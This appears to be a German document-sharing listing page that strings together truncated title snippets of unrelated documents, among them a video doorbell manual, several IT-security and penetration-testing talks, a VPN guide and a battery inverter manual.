Smar,& VIDEO DOORBELL. Schnellstartanleitung

Smar,& VIDEO DOORBELL. Schnellstartanleitung Smar,& VIDEO DOORBELL Schnellstartanleitung Produkt Zeichnung - Vorderseite 1. PIR Bewegungssensor 2. Infrarot LED x 6 3. Lichtsensor 4. 166 HD Kamera 5. Mikrofon 6. Druckknopf 7. Anzeige LED 8. Lautsprecher

Mehr

Penetration Testing und Ethical Hacking Joel Tekeste, IBM Security Services Advisory IT Specialist

Penetration Testing und Ethical Hacking Joel Tekeste, IBM Security Services Advisory IT Specialist Kunde und IBM vertraulich August 2011 Mögliche Sicherheitslücken im Unternehmen erkennen Die IBM Sicherheitsanalyse Kompakt Penetration Testing und Ethical Hacking Joel Tekeste, IBM Security Services Advisory

Mehr

Online Zusammenarbeit Grundlegende Kenntnisse. von Christoph Grill

Online Zusammenarbeit Grundlegende Kenntnisse. von Christoph Grill Online Zusammenarbeit Grundlegende Kenntnisse von Christoph Grill Grundlegende Kenntnisse Grundlage für die Nutzung der Online Zusammenarbeit ist die IKT Informations- und Kommunikationstechnologie Erst

Mehr

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko?

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko? Cnlab / CSI 2011 Demo Smart-Phone: Ein tragbares Risiko? Agenda Demo 45 Schutz der Smart-Phones: - Angriffsszenarien - «Jailbreak» - Was nützt die PIN? - Demo: Zugriff auf Passwörter iphone Bekannte Schwachstellen

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Penetrationstests mit Metasploit

Penetrationstests mit Metasploit Michael Kohl Linuxwochenende 2011 24 September 2011 Outline 1 Einleitung 2 Penetration Testing 3 Metasploit 4 Demo 5 Ressourcen Über mich Früher: Linux/Unix Admin / Systems Engineer Jetzt: Rails-Entwickler,

Mehr

Microsoft-Prüfung. Installation, Storage, and Compute with Windows Server Preview EXAM PACK

Microsoft-Prüfung. Installation, Storage, and Compute with Windows Server Preview EXAM PACK 70-740 Microsoft-Prüfung Installation, Storage, and Compute with Windows Server 2016 Preview EXAM PACK Das komplett 70-410 EXAM PACK mit 100 Prüfungsfragen kann unter mschulz@consuit.ch für 65 CHF bestellt

Mehr

CYBER SECURITY SICHERN, WAS VERBINDET. Dr. Rüdiger Peusquens it-sa Nürnberg, 08.-10.10.2013

CYBER SECURITY SICHERN, WAS VERBINDET. Dr. Rüdiger Peusquens it-sa Nürnberg, 08.-10.10.2013 CYBER SECURITY SICHERN, WAS VERBINDET. Dr. Rüdiger Peusquens it-sa Nürnberg, 08.-10.10.2013 IT HEUTE UND MORGEN Die Welt im Netz Das Netz wird wichtiger als der Knoten Prozesse statt Computer Cloud, Cloud,

Mehr

Internet of Things (IoT)

Internet of Things (IoT) 04. FEBRUAR 2016 Internet of Things (IoT) Bitte einsteigen Beate Lay, Thomas Lundström Referenten Beate Lay Microsoft Certified Trainer (MCT).NET Programmierung SharePoint Entwicklung Thomas Lundström

Mehr

Mit sicherer IT im Wettbewerb voraus

Mit sicherer IT im Wettbewerb voraus Mit sicherer IT im Wettbewerb voraus Datenschutz und Sicherheit in der Unternehmenspraxis www.richter-rw.de Datenpanne bei Facebook: Entwickler hatten Zugang zu Fotos Stern Online, 14.12.2018 Zugriff auf

Mehr

Sichere Systemadministration unter UNIX

Sichere Systemadministration unter UNIX Humboldt University Computer Science Department Sichere Systemadministration unter UNIX Jan-Peter Bell bell@informatik.hu-berlin.de Vorlesung: Jan-Peter Bell Fr. 9:15-10:45, RUD 25 3.101 Praktikum (falls

Mehr

Schnellanleitung. WLAN-Kamera. 1 wenn Sie Ergebnisse brauchen

Schnellanleitung. WLAN-Kamera. 1  wenn Sie Ergebnisse brauchen Schnellanleitung WLAN-Kamera 1 www.alarm.de wenn Sie Ergebnisse brauchen Packungsinhalt Kamera Netzteil Schnellanleitung englisch CD mit Software und Handbuch Schaubild 2 www.alarm.de wenn Sie Ergebnisse

Mehr

Advanced Persistent Threat

Advanced Persistent Threat Advanced Persistent Threat Ivan Bütler Compass Security AG, Schweiz Ivan.buetler@csnc.ch Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel.+41 55-214 41 60 Fax+41 55-214 41 61

Mehr

IT Solutions. AnyConnect unter Linux (Ubuntu 14.04) Gültige VPN Accounts:

IT Solutions. AnyConnect unter Linux (Ubuntu 14.04) Gültige VPN Accounts: IT Solutions AnyConnect unter Linux (Ubuntu 14.04) Gültige VPN Accounts: UserID@tuwien.ac.at UserID@vpn.tuwien.ac.at UserID@student.tuwien.ac.at Es stehen zwei Profile zur Verfügung. Diese werden beim

Mehr

Datensicherheit richtig überwachen und verwalten wie Sie Datenschutzverstöße verhindern

Datensicherheit richtig überwachen und verwalten wie Sie Datenschutzverstöße verhindern Datensicherheit richtig überwachen und verwalten wie Sie Datenschutzverstöße verhindern Die praktische Umsetzung der EU-Datenschutz-Grundverordnung NextGen Security mit Sophos Synchronized Security Björn

Mehr

OpenSecurity Open Source Sicherheitslösungen schützen Angestellte und Daten in öffentlichen Institutionen. Das Projekt Das Produkt

OpenSecurity Open Source Sicherheitslösungen schützen Angestellte und Daten in öffentlichen Institutionen. Das Projekt Das Produkt OpenSecurity @ OPEN COMMONS_KONGRESS 2014 OpenSecurity Open Source Sicherheitslösungen schützen Angestellte und Daten in öffentlichen Institutionen Das Projekt Das Produkt Nikolaus Dürk, MAS X-Net Services

Mehr

VDE/DKE-Tagung Funktionale Sicherheit und IT-Sicherheit Stand der Technik auf der Gegenseite Einführung in Hacking-Tools

VDE/DKE-Tagung Funktionale Sicherheit und IT-Sicherheit Stand der Technik auf der Gegenseite Einführung in Hacking-Tools Solutions for Embedded Security www.protectem.de VDE/DKE-Tagung Funktionale Sicherheit und IT-Sicherheit 2017 Stand der Technik auf der Gegenseite Einführung in Hacking-Tools Erfurth 22.-23. März 2017

Mehr

Abhilfe Wenn Keine Verbindung Zum Gateway Möglich Ist

Abhilfe Wenn Keine Verbindung Zum Gateway Möglich Ist Abhilfe Wenn Keine Verbindung Zum Gateway Möglich Ist In seltenen Fällen kann es vorkommen das Kunden Schwierigkeiten haben eine Verbindung zum Gateway herzustellen. Für diese Fälle gibt es hier die Hilfestellung

Mehr

Datenschleuse Plus. Bedrohungen durch Schadsoftware beseitigen

Datenschleuse Plus. Bedrohungen durch Schadsoftware beseitigen Bedrohungen durch Schadsoftware beseitigen USB Quick-Scan USB to Secure USB USB to Network-Share Network to Network Einführung Ihr Gatekeeper - beim Eintritt von Daten in ein Netzwerk und als Dienst zwischen

Mehr

Anleitung Anschluss der BYD B-BOX HV an den PIKO BA Wechselrichter

Anleitung Anschluss der BYD B-BOX HV an den PIKO BA Wechselrichter Anleitung Anschluss der BYD B-BOX HV an den PIKO BA Wechselrichter Seite 1 / 8 BYD B-BOX HV Batterie Ansicht offenes Gehäuse der BCU und deren Anschlüsse Seite 2 / 8 Einbau der Schnittstellenkarte in den

Mehr

IT-Security aus dem Nähkästchen oder Das kann mir nicht passieren...

IT-Security aus dem Nähkästchen oder Das kann mir nicht passieren... oder Das kann mir nicht passieren... jens.liebchen@redteam-pentesting.de http://www.redteam-pentesting.de 14. DFN-Cert Workshop Sicherheit in vernetzten Systemen 7.-8. Februar 2007, Hamburg Jens Liebchen

Mehr

Computerwerkstatt. Updates - auf allen Geräten, wie wichtig ist das?

Computerwerkstatt. Updates - auf allen Geräten, wie wichtig ist das? 06-11-2017 Computerwerkstatt Updates - auf allen Geräten, wie wichtig ist das? Gast im Studio: Andreas Reinhardt, Fachjournalist Kaffee oder Tee Computerexperte Computer, Laptops, Tablet Pcs und Smartphones

Mehr

Was sind die größten IT-Sicherheitsherausforderungen?

Was sind die größten IT-Sicherheitsherausforderungen? Was sind die größten IT-Sicherheitsherausforderungen? Prof. Dr. (TU NN) Norbert Pohlmann Institut für Internet-Sicherheit if(is) Westfälische Hochschule, Gelsenkirchen http://www.internet-sicherheit.de

Mehr

Herzlich Willkommen zur Live Hacking Demonstration. Ralf Wildvang und Thomas Pusch

Herzlich Willkommen zur Live Hacking Demonstration. Ralf Wildvang und Thomas Pusch Herzlich Willkommen zur Live Hacking Demonstration Ralf Wildvang und Thomas Pusch Ralf Wildvang Senior Berater ML Consulting Berater und Trainer in der Kampagne Sicher gewinnt Trainer für IT- und Informationssicherheit

Mehr

Konfiguration. Arthur Zaczek. Mar 2015

Konfiguration. Arthur Zaczek. Mar 2015 Arthur Zaczek Mar 2015 1 Konfiguration 1.1 Leitspruch Hardcoded gibt es nicht 1.2 Was gehört in eine Konfiguration Datei? Allg.: Alles, was auf dem Zielsystem Variabel ist, z.b.: Datenbankconnection Strings

Mehr